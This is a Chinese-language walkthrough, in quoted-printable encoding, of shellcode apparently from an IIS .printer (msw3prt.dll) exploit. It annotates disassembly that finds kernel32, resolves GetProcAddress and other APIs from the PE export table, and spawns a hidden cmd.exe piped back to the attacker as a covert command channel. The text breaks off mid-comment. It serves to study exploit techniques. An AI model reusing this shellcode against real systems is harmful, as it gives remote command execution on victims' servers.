=CF=C2=C3=E6=B5=C4=BA=DA=BF=CD=C2=EB=B4=D3=B5=D8=D6=B70x00EFFCC9=B5= =BD0x00EFFE57=D6=AE=BC=E4=CA=C7=BF=C9=D6=B4=D0=D0=D6=B8=C1=EE=A3=AC=BD=F4= =B8=FA=D7=C5=B5=C4=CA=C7=BA=AF=CA=FD=D6=B8=C1=EE=B1=ED(=B4=D30x00EFFE58=BF= =AA=CA=BC)=A3=AC=D5=E2=D0=A9=BA=AF=CA=FD=B5=C4=C6=F0=CA=BC=B5=D8=D6=B7=BD= =AB=CF=C8=B1=BB=BD=E2=BE=F6(Resolve)=A3=AC=C8=BB=BA=F3=CE=D2=C3=C7=B5=C4=BA= =DA=BF=CD=C2=EB=BE=CD=BF=C9=D2=D4=B4=D3=D6=B8=C1=EE=B1=ED=D6=D0=B5=F7=D3=C3= =D5=E2=D0=A9=BA=AF=CA=FD=A1=A3=CA=B9=D3=C3=BA=AF=CA=FD=D6=B8=C1=EE=B1=ED=CA= =C7Windows=C9=CFExploit=B3=A3=BC=FB=B5=C4=BC=BC=C7=C9=A1=A3

=CF=C2= =C3=E6=C7=EB=B4=F3=BC=D2=B8=FA=D7=C5=CE=D2=B5=C4=D7=A2=CA=CD=C0=B4=B7=D6=CE= =F6=D5=E2=D0=A9=BB=E3=B1=E0=D6=B8=C1=EE=A3=BA

00EFFCC9=20 E985010000      =20 jmp        =20 00EFFE53
00EFFCCE=20 = 5A            = ;  =20 pop        =20 = edx
/*
=BE=AD=B9=FD=C9=CF=C3=E6=B5=C4jmp=D6=B8=C1=EE=D2=D4=BC=B0=B5= =D8=D6=B70X00EFFE53=B5=C4call=D6=B8=C1=EE=BA=F3=A3=ACcall=D6=B8=C1=EE=BA=F3= =C3=E6=B5=C4=BA=AF=CA=FD=D6=B8=C1=EE=B1=ED(Instruction=20 = Table)=B5=C4=C6=F0=CA=BC=B5=D8=D6=B7=B1=BB=B4=E6=C8=EB=B6=D1=D5=BB=D6=D0=A3= =AC=B6=F8pop=20 = edx=BE=CD=BB=E1=B0=D1=D5=E2=B8=F6=B5=D8=D6=B7=D4=D9=B4=D3=B6=D1=D5=BB=D6=D0= =B5=AF=C8=EB=BC=C4=B4=E6=C6=F7edx=A1=A3=D5=E2=D1=F9=CE=D2=C3=C7=BE=CD=B5=C3= =B5=BD=C1=CB=D6=B8=C1=EE=B1=ED(Instruction=20 Table)=B5=C4=C6=F0=CA=BC=B5=D8=D6=B7=A1=A3
*/
00EFFCCF = B80000F177      =20 mov         = eax,offset=20 = __except_list+2F000h
/*
=B7=FB=BA=C5__except_list=D4=DA=D5=E2=C0=EF= =C3=BB=CA=B2=C3=B4=D2=E2=D2=E5=A3=AC=CD=FC=BC=C7=CB=FC----=BE=CD=CF=F3=CD= =FC=BC=C7=C4=E3=B5=C4=C7=B0=C8=CE=C5=AE=C5=F3=D3=D1=C4=C7=D1=F9=A1=A3=D5=E2= =C0=EF=CE=D2=C3=C7=D6=BB=CA=C7=B0=D10X77f10000=B4=E6=C8=EB=BC=C4=B4=E6=C6= =F7eax=A1=A3
*/
00EFFCD4=20 81384D5A9000    =20 cmp         dword = ptr=20 [eax],905A4Dh
00EFFCDA=20 = 7403           &nb= sp;=20 = je          00EFFCDF00EFFCDC=20 = 48            = ;  =20 dec         = eax
00EFFCDD=20 = EBF5           &nb= sp;=20 jmp        =20 = 00EFFCD4
/*
=B4=F3=BC=D2=D6=AA=B5=C0=A3=ACWindows=B2=D9=D7=F7=CF=B5= =CD=B3=CF=C2=B5=C4=D6=B4=D0=D0=CE=C4=BC=FE=BB=F2=B6=AF=CC=AC=C1=AA=BD=E1=BF= =E2=BE=DF=D3=D0Portable=20 = Executable=B8=F1=CA=BD=A3=AC=D5=E2=D6=D6=B8=F1=CA=BD=B5=C4=CE=C4=BC=FE=D2= =D4905A4Dh=BF=AA=CA=BC=A3=AC=CB=F9=D2=D4=D5=D2=B5=BD905A4Dh=BE=CD=D2=E2=CE= =B6=D7=C5=D5=D2=B5=BD=C1=CB=CE=C4=BC=FE=B5=C4=C6=F0=CA=BC=B5=D8=D6=B7=A1=A3= =C4=E3=C3=C7=B2=BB=B7=C1=D3=C3HexEditor=B4=F2=BF=AA=D2=BB=B8=F6PE=B8=F1=CA= =BD=B5=C4dll=BB=F2exe=BF=B4=BF=B4=A3=AC=B3=FD=C1=CB=D5=E2=B8=F6905A4Dh=D6= =AE=CD=E2=A3=ACPE=B8=F1=CA=BD=D6=D0=BB=B9=D3=D0=BA=DC=B6=E0=D3=D0=C8=A4=B5= =C4Information=A1=A3

=C9=CF=C3=E6=B5=C4=D6=B8=C1=EE=B4=D30X77f1000= 0=BF=AA=CA=BC=CF=F2=B5=CD=B5=D8=D6=B7=B7=BD=CF=F2=D1=B0=D5=D2905A4Dh=A3=AC= =D7=EE=CF=C8=D5=D2=B5=BD=B5=C4905A4Dh=CA=F4=D3=DA=B6=AF=CC=AC=C1=AA=BD=E1= =BF=E2kernel32=A3=AC=BD=E1=B9=FB=BC=C4=B4=E6=C6=F7eax=BD=AB=D6=B8=CF=F2=B6= =AF=CC=AC=C1=AA=BD=E1=BF=E2kernel32=B5=C4=C6=F0=CA=BC=B5=D8=D6=B7=A1=A3=CE= =D2=CB=F9=D3=C3=B5=C4kernel32=B5=C4=C6=F0=CA=BC=B5=D8=D6=B7=CE=AA0x77e800= 00=A1=A3=CE=D2=C3=C7=BF=C9=D2=D4=D4=DA=C3=FC=C1=EE(Command)=B4=B0=BF=DA=BA= =CB=CA=B5=D2=BB=CF=C2=A3=BA
*/
>=20 dd 77e80000
0x77E80000  00905a4d 00000003 = 00000004=20 0000ffff MZ..............
0x77E80010  000000b8 = 00000000=20 00000040 00000000 = ........@.......
0x77E80020  00000000=20 00000000 00000000 00000000=20 ................
0x77E80030  00000000 00000000 = 00000000=20 000000d0 ................
0x77E80040  0eba1f0e = cd09b400=20 4c01b821 685421cd = ........!..L.!Th
0x77E80050  70207369=20 72676f72 63206d61 6f6e6e61 is program=20 canno
0x77E80060  65622074 6e757220 206e6920 = 20534f44 t=20 be run in DOS
0x77E80070  65646f6d 0a0d0d2e = 00000024=20 00000000=20 = mode....$.......
/*
=D6=AE=CB=F9=D2=D4=D2=AA=D1=B0=D5=D2kernel32=B5= =C4=C6=F0=CA=BC=B5=D8=D6=B7=A3=AC=CA=C7=D2=F2=CE=AAkernel32.dll=CA=E4=B3=F6= =BA=AF=CA=FDgetprocAddress=A3=AC=CE=D2=C3=C7=D2=AA=CF=EB=B5=C3=B5=BDgetpr= ocAddress=D4=DA=C4=DA=B4=E6=D6=D0=B5=C4=B5=D8=D6=B7=A3=AC=D0=E8=D2=AA=B4=D3= kernel32=B5=C4=C6=F0=CA=BC=B5=D8=D6=B7=BF=AA=CA=BC=BC=C6=CB=E3(=BC=C6=CB=E3= =B9=FD=B3=CC=D4=DA=CF=C2=C3=E6)=A1=A3=C8=E7=B9=FB=C4=E3=CE=CA=CE=D2=CE=AA= =CA=B2=C3=B4=D2=AA=B5=C3=B5=BDgetprocAddress=B5=C4=B5=D8=D6=B7=A3=AC=CE=D2= =B2=BB=B8=E6=CB=DF=C4=E3=A3=A1=C4=E3=B8=FA=D7=C5=CD=F9=CF=C2=C3=E6=BF=B4=BE= =CD=BB=E1=C2=FD=C2=FD=B5=D8=D6=AA=B5=C0=D4=AD=D2=F2=A1=A3
*/
00EFFC= DF=20 = 8BD8           &nb= sp;=20 mov        =20 ebx,eax
00EFFCE1=20 = 8B733C          =20 mov         = esi,dword ptr=20 [ebx+3Ch]
00EFFCE4=20 = 03F3           &nb= sp;=20 add        =20 esi,ebx
00EFFCE6=20 = 8B7678          =20 mov         = esi,dword ptr=20 [esi+78h]
00EFFCE9=20 = 03F3           &nb= sp;=20 add        =20 esi,ebx
00EFFCEB=20 = 8B7E20          =20 mov         = edi,dword ptr=20 [esi+20h]
00EFFCEE=20 = 03FB           &nb= sp;=20 add        =20 edi,ebx
00EFFCF0=20 = 8B4E14          =20 mov         = ecx,dword ptr=20 [esi+14h]
00EFFCF3=20 = 33ED           &nb= sp;=20 xor        =20 ebp,ebp
00EFFCF5=20 = 56            = ;  =20 = push        esi
00EFFCF6=20 = 57            = ;  =20 = push        edi
00EFFCF7=20 = 51            = ;  =20 = push        ecx
00EFFCF8=20 = 8B3F           &nb= sp;=20 mov         = edi,dword ptr=20 [edi]
00EFFCFA=20 = 03FB           &nb= sp;=20 add         edi,ebx=20 = //=B0=D1=CA=E4=B3=F6=BA=AF=CA=FD=C3=FB=B1=ED=C6=F0=CA=BC=B5=D8=D6=B7=B4=E6= =C8=CBedi
00EFFCFC=20 = 8BF2           &nb= sp;=20 mov         esi,edx=20 = //=D6=B8=C1=EE=B1=ED=C6=F0=CA=BC=B5=D8=D6=B7=B4=E6=C8=EBesi
00EFFCFE=20 B90E000000      =20 mov         ecx,0Eh=20 = //=BA=AF=CA=FDgetprocAddress=B3=A4=B6=C8=CE=AA0Eh
00EFFD03=20 = F3A6           &nb= sp;=20 repe cmps   byte ptr [esi],byte ptr = [edi]
00EFFD05=20 = 7408           &nb= sp;=20 = je          00EFFD0F00EFFD07=20 = 59            = ;  =20 pop         = ecx
00EFFD08=20 = 5F            = ;  =20 pop         = edi
00EFFD09=20 = 83C704          =20 add        =20 edi,4
00EFFD0C=20 = 45            = ;  =20 inc         = ebp
00EFFD0D=20 = E2E7           &nb= sp;=20 = loop        00EFFCF6
00EFFD0F = = 59            = ;  =20 pop         = ecx
00EFFD10=20 = 5F            = ;  =20 pop         = edi
00EFFD11=20 = 5E            = ;  =20 pop         = esi
00EFFD12=20 = 8BCD           &nb= sp;=20 mov        =20 ecx,ebp
00EFFD14=20 = 8B4624          =20 mov         = eax,dword ptr=20 [esi+24h]
00EFFD17=20 = 03C3           &nb= sp;=20 add        =20 eax,ebx
00EFFD19=20 = D1E1           &nb= sp;=20 shl        =20 ecx,1
00EFFD1B=20 = 03C1           &nb= sp;=20 add        =20 eax,ecx
00EFFD1D=20 = 33C9           &nb= sp;=20 xor        =20 ecx,ecx
00EFFD1F=20 = 668B08          =20 mov         cx,word = ptr=20 [eax]
00EFFD22=20 = 8B461C          =20 mov         = eax,dword ptr=20 [esi+1Ch]
00EFFD25=20 = 03C3           &nb= sp;=20 add        =20 eax,ebx
00EFFD27=20 = C1E102          =20 shl        =20 ecx,2
00EFFD2A=20 = 03C1           &nb= sp;=20 add        =20 eax,ecx
00EFFD2C=20 = 8B00           &nb= sp;=20 mov         = eax,dword ptr=20 [eax]
00EFFD2E=20 = 03C3           &nb= sp;=20 add        =20 = eax,ebx
/*
=CD=A8=B9=FD=C9=CF=C3=E6=D2=BB=B6=D1=D1=DB=BB=A8=E7=D4=C2= =D2=B5=C4=D6=B8=C1=EE=CE=D2=C3=C7=BC=C6=CB=E3=B3=F6=BA=AF=CA=FDgetprocAdd= ress=D4=DA=C4=DA=B4=E6=D6=D0=B5=C4=B5=D8=D6=B7=CE=AA0x77E9564B=A1=A3=D6=B8= =C1=EE=CB=F9=D3=C3=B5=C4=CB=E3=B7=A8=CA=C7=CC=D8=B1=F0=D5=EB=B6=D4Portabl= e=20 Executable=B8=F1=CA=BD=B5=C4=A1=A3
*/
00EFFD30=20 = 8BF2           &nb= sp;=20 mov        =20 esi,edx
00EFFD32=20 = 8BFE           &nb= sp;=20 mov        =20 edi,esi
00EFFD34=20 = 8BD0           &nb= sp;=20 mov         edx,eax=20 //edx=3D0x77E9564B
00EFFD36=20 B90C000000      =20 mov         ecx,0Ch=20 = //=B9=B2=D0=E8=D2=AA=BD=E2=BE=F612=B8=F6=BA=AF=CA=FD=B5=D8=D6=B7
00EFF= D3B=20 E800010000      =20 = call        00EFFE40
/*
=CE= =BB=D3=DA=B5=D8=D6=B70x00EFFE40=B5=C4=D7=D3=B3=CC=D0=F2=B8=BA=D4=F0=BD=E2= =BE=F6=D6=B8=C1=EE=B1=ED=D6=D0=BA=AF=CA=FD=C3=C7=B5=C4=B5=D8=D6=B7=A1=A3=C9= =CF=C3=E6=B5=C4=D6=B8=C1=EE=CF=C8=BD=E2=BE=F6=D3=C9kernel32.dll=CA=E4=B3=F6= =B5=C4=BA=AF=CA=FD=C3=C7=B5=C4=B5=D8=D6=B7=A3=AC=CB=FC=C3=C7=B5=C4=D7=DC=CA= =FD12(=BE=CD=CA=C70Ch)=D4=DA=BC=C4=B4=E6=C6=F7ecx=D6=D0=A3=AC=BA=AF=CA=FD= =B5=C4=C3=FB=D7=D6=C3=C7=D3=C9edi=BA=CDesi=D6=D0=B5=C4=D6=B8=D5=EB=D6=B8=CF= =F2=A1=A3=D5=E2=D0=A9=B5=C4=BA=AF=CA=FD=CA=C7=A3=BALoadLibraryA=A1=A2Crea= tePipe=A1=A2GetStartupInfoA=A1=A2CreateProcessA=A1=A2PeekNamedPipe=A1=A2G= lobalAlloc=A1=A2WriteFile=A1=A2ReadFile=A1=A2VirtualProtect=A1=A2Sleep=A1= =A2ExitProcess=A1=A2CloseHandle=A1=A3=BD=E2=BE=F6=BA=F3=B5=C4=BA=AF=CA=FD= =B5=D8=D6=B7=BE=CD=B4=E6=B7=C5=D4=DA=D6=B8=C1=EE=B1=ED=D6=D0=A1=A3
=BD=D3=CF=C2=C8=A5=BD=E2=BE=F6=D3=C9msw3prt.dll=CA=E4=B3=F6=B5=C4=BA=AF=CA= =FD(=CA=B5=BC=CA=C9=CF=BE=CD=D2=BB=B8=F6=BA=AF=CA=FDHttpExtensionProc)=A1= =A3
*/
00EFFD40=20 = 33C0           &nb= sp;=20 xor        =20 eax,eax
00EFFD42=20 = AC            = ;  =20 lods        byte ptr = [esi]
00EFFD43=20 = 85C0           &nb= sp;=20 = test        eax,eax
00EFFD45=20 = 75F9           &nb= sp;=20 jne         00EFFD40 = = //=D4=DA=D6=B8=C1=EE=B1=ED=D6=D0=D2=C6=B6=AF=D6=B8=D5=EB=B5=BD=CF=C2=D2=BB= =B8=F6=D7=D6
         &nb= sp;           &nbs= p;          //=B7=FB=B4= =AE----MSW3PRT
00EFFD47=20 = 52            = ;  =20 = push        edx
00EFFD48=20 = 56            = ;  =20 = push        esi
00EFFD49=20 = FF57D0          =20 call        dword = ptr=20 = [edi-30h]
/*
=CF=C8=D4=DA=D6=B8=C1=EE=B1=ED=D6=D0=D1=B0=D5=D2=CF=C2= =D2=BB=B8=F6=D7=D6=B7=FB=B4=AEMSW3PRT=A3=AC=C8=BB=BA=F3=B5=F7=D3=C3=CE=BB= =D3=DA=D6=B8=C1=EE=B1=ED[edi-30h]=B5=C4=BA=AF=CA=FDLoadLibraryA=B0=D1=B6=AF= =CC=AC=C1=AA=BD=E1=BF=E2MSW3PRT.dll=D4=D8=C8=EB=A1=A3MSDN=B6=D4LoadLibrar= yA=BA=AF=CA=FD=B5=C4=B6=A8=D2=E5=C8=E7=CF=C2=A3=BA
HMODULE=20 LoadLibrary(
  LPCTSTR = lpLibFileName   //=20 file name of=20 = module
);
=CB=FC=D0=E8=D2=AA=D2=BB=B8=F6=CA=E4=C8=EB=B2=CE=CA=FD=A3= =AC=D2=B2=BE=CD=CA=C7=D6=B8=CF=F2=B6=AF=CC=AC=C1=AA=BD=E1=BF=E2=C3=FB=D7=D6= =B5=C4=D6=B8=D5=EB=A1=A3
*/
00EFFD4C=20 = 5A            = ;  =20 pop         = edx
00EFFD4D=20 = 8BD8           &nb= sp;=20 mov        =20 ebx,eax
00EFFD4F = B901000000      =20 mov        =20 ecx,1
00EFFD54 = E8E7000000      =20 = call        00EFFE40
/*
=B5= =F7=D3=C300EFFE40=B4=A6=D7=D3=B3=CC=D0=F2=BD=E2=BE=F6=BA=AF=CA=FDHttpExte= nsionProc=B5=C4=B5=D8=D6=B7=A3=AC
*/
00EFFD59=20 6800050000      =20 = push        500h
00EFFD5E=20 = 6A40           &nb= sp;=20 = push        40h
00EFFD60=20 = FF57E0          =20 call        dword = ptr=20 [edi-20h]
00EFFD63=20 = 894708          =20 mov         dword = ptr=20 = [edi+8],eax
/*
=B5=F7=D3=C3=D6=B8=C1=EE=B1=ED=D6=D0=B5=C4=BA=AF=CA=FD= GlobalAlloc(=BA=AF=CA=FD=B5=D8=D6=B7=D4=DA[edi-20h]=D6=D0)=D4=DA=C4=DA=B4= =E6=D6=D0=D4=A4=B1=B8(allocate)=20 500=20 = bytes=B5=C4=BF=D5=BC=E4=A3=AC=B0=D1=D5=E2=B8=F6=C4=DA=B4=E6=BF=D5=BC=E4=B5= =C4=D6=B8=D5=EB=B4=E6=C8=EB[edi+8]=D6=D0=A3=AC=D5=E2=B8=F6=C4=DA=B4=E6=BF= =D5=BC=E4=BD=AB=D7=F7=CE=AA=CE=D2=C3=C7=C3=D8=C3=DC=CD=A8=D1=B6=C7=FE=B5=C0= =B5=C4=BB=BA=B3=E5=C7=F8=A1=A3=BA=AF=CA=FDGlobalAlloc=B5=C4=B6=A8=D2=E5=A3= =BA
HGLOBAL=20 GlobalAlloc(
  UINT = uFlags,     //=20 allocation attributes
  SIZE_T = dwBytes   //=20 number of bytes to allocate
);
*/
00EFFD66=20 C7471C0C000000  =20 mov         dword = ptr=20 [edi+1Ch],0Ch
00EFFD6D C7472000000000  =20 mov         dword = ptr=20 [edi+20h],0
00EFFD74 C7472401000000  =20 mov         dword = ptr=20 [edi+24h],1
00EFFD7B=20 = 6A00           &nb= sp;=20 = push        0
00EFFD7D=20 = 8D471C          =20 lea        =20 eax,[edi+1Ch]
00EFFD80=20 = 50            = ;  =20 = push        eax
00EFFD81=20 = 8D470C          =20 lea        =20 eax,[edi+0Ch]
00EFFD84=20 = 50            = ;  =20 = push        eax
00EFFD85=20 = 8D4710          =20 lea        =20 eax,[edi+10h]
00EFFD88=20 = 50            = ;  =20 = push        eax
00EFFD89=20 = FF57D0          =20 call        dword = ptr=20 = [edi-30h]
/*
=B5=F7=D3=C3=BA=AF=CA=FDCreatePipe(=B5=D8=D6=B7=D4=DA[= edi-30h]=D6=D0)=D6=C6=D4=EC=D2=BB=B8=F6=CA=E4=B3=F6Pipe=A1=A3=CB=FC=B5=C4= Read=20 = Handler=BD=AB=B4=E6=C8=EB=B5=D8=D6=B7[edi+10h]=A3=AC=B6=F8Write = Handler=BD=AB=B4=E6=C8=EB=B5=D8=D6=B7[edi+0Ch]=A3=BBPipe=20 = Buffer=B5=C4=B4=F3=D0=A1=CE=AA0----=D5=E2=B1=ED=CA=BE=CE=D2=C3=C7=BD=AB=CA= =B9=D3=C3=CF=B5=CD=B3=C8=B1=CA=A1=D6=B5=A3=BB=B4=D3=B5=D8=D6=B7[edi+1Ch]=BF= =AA=CA=BC=B5=C412=B8=F6=D7=D6=BD=DA=CE=AAPipe=B5=C4=B0=B2=C8=AB=CA=F4=D0=D4= =A3=AC=D5=E2=B8=F6Pipe=CA=C7=BF=C9=BC=CC=B3=D0(inheritable)=B5=C4=A1=A2=CA= =B9=D3=C3=C8=B1=CA=A1security=20 descriptor=B5=C4Pipe=A1=A3 = =BA=AF=CA=FDCreatePipe=B5=C4=B6=A8=D2=E5=A3=BA
BOOL=20 CreatePipe(
  PHANDLE=20 = hReadPipe,          &nb= sp;           =20 // read handle
  PHANDLE=20 = hWritePipe,          &n= bsp;           // = write handle
  LPSECURITY_ATTRIBUTES=20 lpPipeAttributes,  // security=20 attributes
  DWORD=20 = nSize           &n= bsp;           &nb= sp;      //=20 pipe size
);
*/
00EFFD8C=20 = 6A00           &nb= sp;=20 = push        0
00EFFD8E=20 = 8D471C          =20 lea        =20 eax,[edi+1Ch]
00EFFD91=20 = 50            = ;  =20 = push        eax
00EFFD92=20 = 8D4714          =20 lea        =20 eax,[edi+14h]
00EFFD95=20 = 50            = ;  =20 = push        eax
00EFFD96=20 = 8D4718          =20 lea        =20 eax,[edi+18h]
00EFFD99=20 = 50            = ;  =20 = push        eax
00EFFD9A=20 = FF57D0          =20 call        dword = ptr=20 = [edi-30h]
/*
=D3=D6=B5=F7=D3=C3=BA=AF=CA=FDCreatePipe=D6=C6=D4=EC=D2= =BB=B8=F6=CA=E4=C8=EBPipe=A1=A3=CB=FC=B5=C4Read=20 = Handler=BD=AB=B4=E6=C8=EB=B5=D8=D6=B7[edi+18h]=A3=AC=B6=F8Write = Handler=BD=AB=B4=E6=C8=EB=B5=D8=D6=B7[edi+14h]=A3=BBPipe=20 = Buffer=B5=C4=B4=F3=D0=A1=CE=AA=CA=A1=D6=B5=A3=BB=D5=E2=B8=F6Pipe=CD=AC=D1= =F9=CA=C7=BF=C9=BC=CC=B3=D0(inheritable)=B5=C4=A1=A2=CA=B9=D3=C3=C8=B1=CA= =A1security=20 descriptor=B5=C4Pipe=A1=A3
*/
00EFFD9D=20 = 8D4728          =20 lea        =20 eax,[edi+28h]
00EFFDA0=20 = 50            = ;  =20 = push        eax
00EFFDA1=20 = FF57D4          =20 call        dword = ptr=20 = [edi-2Ch]
/*
=B5=F7=D3=C3=BA=AF=CA=FDGetStartupInfo(=B5=D8=D6=B7=D4= =DA[edi-2Ch]=D6=D0)=C8=A1=B5=C3=B1=BE=BD=F8=B3=CC=B5=C4=D2=BB=CF=B5=C1=D0= =C6=F4=B6=AF=D0=C5=CF=A2(StartupInfo)=A3=AC=B2=A2=B0=D1=B7=B5=BB=D8=B5=C4= =C6=F4=B6=AF=D0=C5=CF=A2=B4=E6=C8=EB=B4=D3=B5=D8=D6=B7[edi+28h]=BF=AA=CA=BC= =B5=C4=C4=DA=B4=E6=A1=A3=CE=D2=C3=C7=BA=F3=C3=E6=D2=AA=BD=E8=D3=C3=D5=E2=B8= =F6=C6=F4=B6=AF=D0=C5=CF=A2=C0=B4=D6=C6=D4=EC=D2=BB=B8=F6=D0=C2=B5=C4=D7=D3= =BD=F8=B3=CCcmd.exe=A1=A3=CF=C2=C3=E6=CA=C7GetStartupInfo=B5=C4=B6=A8=D2=E5= =A3=BA
VOID=20 GetStartupInfo(
  LPSTARTUPINFO=20 lpStartupInfo   // startup=20 information
);
*/
00EFFDA4=20 = 8B470C          =20 mov         = eax,dword ptr=20 [edi+0Ch]
00EFFDA7=20 = 894764          =20 mov         dword = ptr=20 [edi+64h],eax
00EFFDAA=20 = 894768          =20 mov         dword = ptr=20 [edi+68h],eax
00EFFDAD=20 = 8B4718          =20 mov         = eax,dword ptr=20 [edi+18h]
00EFFDB0=20 = 894760          =20 mov         dword = ptr=20 [edi+60h],eax
00EFFDB3 814F5401010000  =20 = or          dword=20 ptr [edi+54h],101h
00EFFDBA = 66C747580000    =20 mov         word ptr = [edi+58h],0
00EFFDC0=20 = 8D476C          =20 lea        =20 eax,[edi+6Ch]
00EFFDC3=20 = 50            = ;  =20 = push        eax
00EFFDC4=20 = 8D4728          =20 lea         = eax,[edi+28h]=20 //=C6=F4=B6=AF=D0=C5=CF=A2
00EFFDC7=20 = 50            = ;  =20 = push        eax
00EFFDC8=20 = 33C0           &nb= sp;=20 xor        =20 eax,eax
00EFFDCA=20 = 50            = ;  =20 = push        eax
00EFFDCB=20 = 50            = ;  =20 = push        eax
00EFFDCC=20 = 50            = ;  =20 = push        eax
00EFFDCD=20 = 6A01           &nb= sp;=20 = push        1   &n= bsp;//=D7=D3=BD=F8=B3=CC=BC=CC=B3=D0=B8=B8=BD=F8=B3=CCHandler
00EFFDCF= =20 = 50            = ;  =20 = push        eax
00EFFDD0=20 = 50            = ;  =20 = push        eax
00EFFDD1=20 = 8BEF           &nb= sp;=20 mov        =20 ebp,edi
00EFFDD3 81C5A8000000    =20 add        =20 = ebp,0A8h    //=C6=AB=D2=C60A8h=B5=BDcmd.exe
00EFFD= D9=20 = 55            = ;  =20 = push        ebp   =  
00EFFDDA=20 = 50            = ;  =20 = push        eax
00EFFDDB=20 = FF57D8          =20 call        dword = ptr=20 = [edi-28h]
/*
=C9=CF=C3=E6=B5=C4=D6=B8=C1=EE=CA=C7=CE=AA=C1=CB=B5=F7= =D3=C3=BA=AF=CA=FDCreateProcess=D6=C6=D4=EC=D2=BB=B8=F6=D2=FE=B2=D8=CA=BD= =B5=C4=D7=D3=BD=F8=B3=CCcmd.exe=A1=A3=C4=E3=C3=C7=BF=B4=B5=BD=C1=CB=A3=AC= =D2=AA=D3=C3=D5=E2=C3=B4=D2=BB=B4=F3=B6=D1=B5=C4=BB=E3=B1=E0=D3=EF=D1=D4=C0= =B4=B4=B4=BD=A8=D5=E2=B8=F6=BD=F8=B3=CC=A3=AC=C8=E7=B9=FB=D3=C3=B8=DF=BC=B6= =D3=EF=D1=D4=CF=F3VC++=C0=B4=D7=F7=CD=AC=D1=F9=B5=C4=CA=C2=A3=AC=D6=BB=D0= =E8=B6=CC=B6=CC=B5=C4=BC=B8=D0=D0=A3=BB=D2=E4=BF=E0=CB=BC=CC=F0=A3=AC=CE=D2= =C3=C7=D5=E6=D3=A6=B8=C3=B8=D0=D0=BB=B1=E0=D0=B4=B8=DF=BC=B6=D3=EF=D1=D4=B1= =E0=D2=EB=C6=F7=B5=C4=C8=CB=A3=AC=CA=C7=CB=FB=C3=C7=B0=D1=B4=F3=BC=D2=B4=D3= =B8=C9=B0=CD=B0=CD=B5=C4=BB=E3=B1=E0=D3=EF=D1=D4=D6=D0=BD=E2=B7=C5=C1=CB=B3= =F6=C0=B4=A3=AC=B4=F3=BC=D2=B4=D3=B4=CB=D5=BE=C6=F0=C0=B4=C1=CF=B0=C1----= =A3=A1=A3=A1

=D7=A2=D2=E2=D7=D3=BD=F8=B3=CCcmd.exe=BB=E1=BC=CC=B3=D0= =B8=B8=BD=F8=B3=CC=B5=C4=CA=E4=C8=EB=BC=B0=CA=E4=B3=F6Pipe=A3=AC=BD=AB=C0= =B4=D5=E2=C1=BD=B8=F6Pipe=BE=CD=CA=C7=CE=D2=C3=C7=B5=C4=C3=D8=C3=DC=C7=FE= =B5=C0=A1=A3=BA=AF=CA=FDCreateProcess=B5=C4=B5=D8=D6=B7=D4=DA[edi-28h]=D6= =D0=A3=AC=CB=FC=B5=C4=B6=A8=D2=E5=C8=E7=CF=C2=A3=BA
BOOL=20 CreateProcess(
  LPCTSTR=20 = lpApplicationName,         &= nbsp;      =20 // name of executable module
  LPTSTR=20 = lpCommandLine,          = ;            = //=20 command line string
  LPSECURITY_ATTRIBUTES=20 lpProcessAttributes, // = SD
  LPSECURITY_ATTRIBUTES=20 lpThreadAttributes,  // SD
  BOOL=20 = bInheritHandles,         &nb= sp;           &nbs= p;//=20 handle inheritance option
  DWORD=20 = dwCreationFlags,         &nb= sp;          =20 // creation flags
  LPVOID=20 = lpEnvironment,          = ;            = //=20 new environment block
  LPCTSTR=20 = lpCurrentDirectory,         =        //=20 current directory name
  LPSTARTUPINFO=20 = lpStartupInfo,          = ;    =20 // startup information
  LPPROCESS_INFORMATION=20 lpProcessInformation // process = information
);
*/
00EFFDDE=20 = FF770C          =20 push        dword = ptr=20 [edi+0Ch]
00EFFDE1=20 = FF57F8          =20 call        dword = ptr=20 [edi-8]
00EFFDE4=20 = FF7718          =20 push        dword = ptr=20 [edi+18h]
00EFFDE7=20 = FF57F8          =20 call        dword = ptr=20 = [edi-8]
/*
=B5=F7=D3=C3=BA=AF=CA=FDCloseHandle(=B5=D8=D6=B7=D4=DA[e= di-8h]=D6=D0)=B9=D8=B1=D5=CE=BB=D3=DA[edi+0Ch]=B5=C4=CA=E4=B3=F6Pipe=B5=C4= Write=20 = Handler=D2=D4=BC=B0=CE=BB=D3=DA[edi+18h]=B5=C4=CA=E4=C8=EBPipe=B5=C4Read = = Handler=A3=AC=CE=D2=C3=C7=B2=BB=D0=E8=D2=AA=D5=E2=C1=BD=B8=F6Handler=A1=A3= =BA=AF=CA=FD=B5=C4=B6=A8=D2=E5=A3=BA
BOOL=20 CloseHandle(
  HANDLE hObject   // = handle to=20 = object
);

=D5=E2=D1=F9=A3=AC=D7=D3=BD=F8=B3=CCcmd.exe=B5=C4=CA=E4= =C8=EB=D3=EB=CA=E4=B3=F6=CA=C7=CD=A8=B9=FD=BC=CC=B3=D0=CF=C2=C0=B4=B5=C4W= rite=20 Handler(=B5=D8=D6=B7[edi+14h])=D3=EBRead Handler = (=B5=D8=D6=B7[edi+10h])=C0=B4=CA=B5=CF=D6=A3=BB=CE=D2=C3=C7=BD=AB=D2=AA=CD= =A8=B9=FDWrite=20 = Handler=CD=F9=D5=E2=B8=F6cmd.exe=CA=E4=C8=EB=C3=FC=C1=EE=A3=AC=CD=A8=B9=FD= Read=20 = Handler=B4=D3=D5=E2=B8=F6cmd.exe=C8=A1=B5=C3=C3=FC=C1=EE=D4=CB=D0=D0=BD=E1= =B9=FB=A1=A3
*/
00EFFDEA=20 = 8D4704          =20 lea        =20 eax,[edi+4]
00EFFDED=20 = 50            = ;  =20 = push        eax
00EFFDEE=20 = 6A04           &nb= sp;=20 = push        4
00EFFDF0=20 6800010000      =20 = push        100h
00EFFDF5=20 = 8B57FC          =20 mov         = edx,dword ptr=20 [edi-4]
00EFFDF8=20 = 52            = ;  =20 = push        edx
00EFFDF9=20 = FF57EC          =20 call        dword = ptr=20 [edi-14h]=20 = //VirtualProtect
/*
